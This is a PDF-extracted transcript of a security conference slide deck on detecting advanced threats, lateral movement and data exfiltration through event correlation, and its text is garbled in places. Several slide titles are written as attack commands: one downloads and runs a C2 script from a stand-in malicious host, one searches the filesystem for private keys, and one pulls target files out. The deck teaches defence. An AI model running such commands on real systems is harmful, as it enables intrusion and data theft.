Advanced Threats & Lateral Movement Detec5on Greg Foss OSCP, GAWN, GPEN, GWAPT, GCIH, CEH Sr. Security Research Engineer LogRhythm Labs
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Advanced Threats & Lateral Movement Detec5on Greg Foss OSCP, GAWN, GPEN, GWAPT, GCIH, CEH Sr. Security Research Engineer LogRhythm Labs
# whoami
• Greg Foss • Sr. Security Researcher • LogRhythm Labs – Threat Intel Team • Former DOE PenetraEon Tester • Focus => Honeypots, Incident Response, and Red Team • OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, etc…
2
# ls -‐lha
IT Security Threats
Event CorrelaEon
DetecEon
DEMO!
1
2
3
4
3
4
# man [Advanced Threats]
• Advanced Persistent Threats • Organized Cyber Crime • Hack5vists • ‘Cyber Terrorists’ • Etc…
• Able to develop and uElize sophisEcated techniques in pursuit of their target objecEve from reconnaissance to data exfiltraEon.
• Will leverage the full spectrum of aWack vectors – social, technical, physical, etc.
• Highly organized, highly moEvated, highly resourced.
• Willing to invest significant Eme and resources to compromise.
5
It’s when, not if…
• Mission Oriented
• Persistent an Driven
• PaEent and Methodical
• Focus on exponenEal ROI
• Emphasis on high IP value targets
• They will get in…
6 Image: hWp://pos^iles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg
Iden5fy a ‘Hacker’
7
Ok, for real…
• *Simple… Correlate on odd network / host ac5vity • Use the data at hand to acEvely detect anomalies • Understand how your organizaEon will respond to a breach /
outage / squirrel affecEng any of the three InfoSec pillars • Confiden5ality • Integrity • Availability
8
Advanced Threat Tac5cs and Evasion
• Threat actors of all types move slowly and quietly over Eme. LimiEng exposure and potenEal for discovery.
• Trending on enterprise data over Eme helps to build baselines that can be used to ac5vely iden5fy anomalies.
9
IT Security Threats
10
# last && echo ‘How are they geYng in??’
• Phishing • 91% of ‘advanced’ aWacks began with a phishing email or
similar social engineering tacEcs. • hWp://www.infosecurity-‐magazine.com/view/29562/91-‐of-‐apt-‐aWacks-‐
start-‐with-‐a-‐spearphishing-‐email/
• 2014 Metrics • Average cost per breach => $3.5 million • 15% Higher than the previous year
• hWp://www.ponemon.org/blog/ponemon-‐insEtute-‐releases-‐2014-‐cost-‐of-‐data-‐breach-‐global-‐analysis
11
# last && echo ‘How are they geYng in??’
• Phishing • 91% of ‘advanced’ aWacks began with a phishing email or
similar social engineering tacEcs. • hWp://www.infosecurity-‐magazine.com/view/29562/91-‐of-‐apt-‐aWacks-‐
start-‐with-‐a-‐spearphishing-‐email/
• 2014 Metrics • Average cost per breach => $3.5 million • 15% Higher than the previous year
• hWp://www.ponemon.org/blog/ponemon-‐insEtute-‐releases-‐2014-‐cost-‐of-‐data-‐breach-‐global-‐analysis
12
# history | more
• It only takes one…
13
# ./searchsploit ‘client side’ && echo ‘new exploits daily!’
14
# cat [cve-‐2014-‐6332] >> /var/www/pwn-‐IE.html
15
Event Correla5on & Detec5on
16
Defense in Depth
17
Spear Phishing
18
Phishing Aback Log Traces
19
$ vim next.sh
• Maintain Access…
20 Image: hWp://www.netresec.com/images/back_door_open_300x200.png
$ ./next.sh
• Then?
• *Nothing…
• For a long Eme… • *not really*
• They have aWained a foothold and are now your newest employees…
21
$ su -‐ root
22
# wget hbp://bad.stuff.net/c2.py . && ./c2.py
• Once infected, the beachhead will beacon periodically
23
Behavioral Analy5cs
• Beaconing Ac5vity – Usually iniEated over port 443 or an encrypted tunnel over port 80.
• Can be detected with a Firewall or Web Proxy • Capability to decrypt SSL traffic is a huge plus
• Behavioral analy5cs can be uElized to differenEate normal browsing acEvity from possible evidence of an infected host. • Using a SIEM, track the unique websites usually visited, and the overall
volume of normal web acEvity, on a per user and a per host basis. • Watch for significant changes over an extended period of Eme.
24
Reconnaissance
• Ping sweeps, service discovery, etc. – NO
• Why make unnecessary noise?
• Instead => access network shares, web apps, and services
• Passively gather informaEon using available resources…
25 Image: hWp://macheads101.com/pages/pics/download_pics/mac/portscan.png
Lateral Movement
• Dump Local System Hashes • Maybe crack them, maybe it’s not even necessary…
• Pass the Hash (PtH)
• Dump plain text passwords • Mimikatz -‐-‐ FTW!
• Act as an internal employee -‐-‐ use legiEmate means to access resources.
26
Uncovering Internal Reconnaissance and Pivo5ng • Security OperaEons Goal => Reduce MTTD and MTTR
• MTTD – Mean Time to Detect • MTTR – Mean Time to Respond
• Set Traps => Honeypot / Honey Token access
• Overt Clues => ModificaEon of user / file / group permissions and pivoEng evidence
• Subtle Clues => VPN access from disparate geographical locaEons
• Missed Opportuni5es => Once inside, they are now an ‘employee’…
27
Lateral Movement Log Traces
• Microsos’s granular Event IdenEficaEon schema (EVID) in conjuncEon with environment informaEon provides analysts with plenty of informaEon to track aWackers once they have breached the perimeter.
28
Passive Data Extrac5on
• Well Poisoning via UNC Paths
• SMB Replay
• Help Desk Tickets
• Responder – By Spider Labs
• Keylogging
29
Passive Traffic Analysis
• Analyze / capture anything that comes across the wire.
• ARP poison hosts of interest, take over switches/routers, etc.
30 Image: hWps://i.chzbgr.com/maxW500/5579525376/h7D009AE4/
# grep –rhi ‘private key’ /* && echo “Iden5fy Key Resources”
• Keys / CerEficates / Passwords • File Shares and Databases
• Intellectual Property
• Domain Controllers / Exchange / etc.
• Business Leaders – CXO, Director, VP, etc. • AdministraEve Assistants
31 Image: hWp://www.mobilemarkeEngwatch.com/wordpress/wp-‐content/uploads/2011/07/Top-‐Secret-‐Tip-‐To-‐Pick-‐SMS-‐Keyword.jpeg
# wget hbp://target/files.tgz && echo “Data Exfiltra5on”
• Target data idenEfied, gathered, and moved out of the environment.
• Data is normally leaked in a ‘hidden’ or modified format, rarely is the actual document extracted.
• Emails and Employee PII
• Intellectual Property
• Trade Secrets
32 Image: hWp://www.csee.umbc.edu/wp-‐content/uploads/2013/04/ex.jpg
Data Exfiltra5on is Open Not ‘Advanced’
33
Catching Data Exfiltra5on
• Granular restric5ons on sensi5ve files and directories to specific groups or individuals, alert on any abnormal file access / read / write / etc.
• DNS exfiltra5on or someEmes even ICMP Tunneling in high security environments
• Non-‐SSL over ports 443 / 8443, encrypted TCP over ports 80 / 8080
• Abnormal web server ac5vity, newly created files, etc.
34
It all comes down to Event Correla5on
35
DEMO
36
DEMO
Closing Thoughts…
• Don’t be hard on the outside, sos and chewy on the inside…
• Implement Layer 3 (network) SegmentaEon and Least User Privilege
• Understand your environment and log data so that you can accurately correlate physical and cyber events
• Implement URL filtering, stateful packet inspecEon, and binary analysis
• AcEvely alert on and respond at the earliest signs of lateral movement and reconnaissance observed within your environment
• The earlier you can detect aWackers the beWer…
37
Thank You!
38
QUESTIONS?
Greg Foss
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH Senior Security Research Engineer
Greg.Foss[at]logrhythm.com @heinzarelli
Related Documents
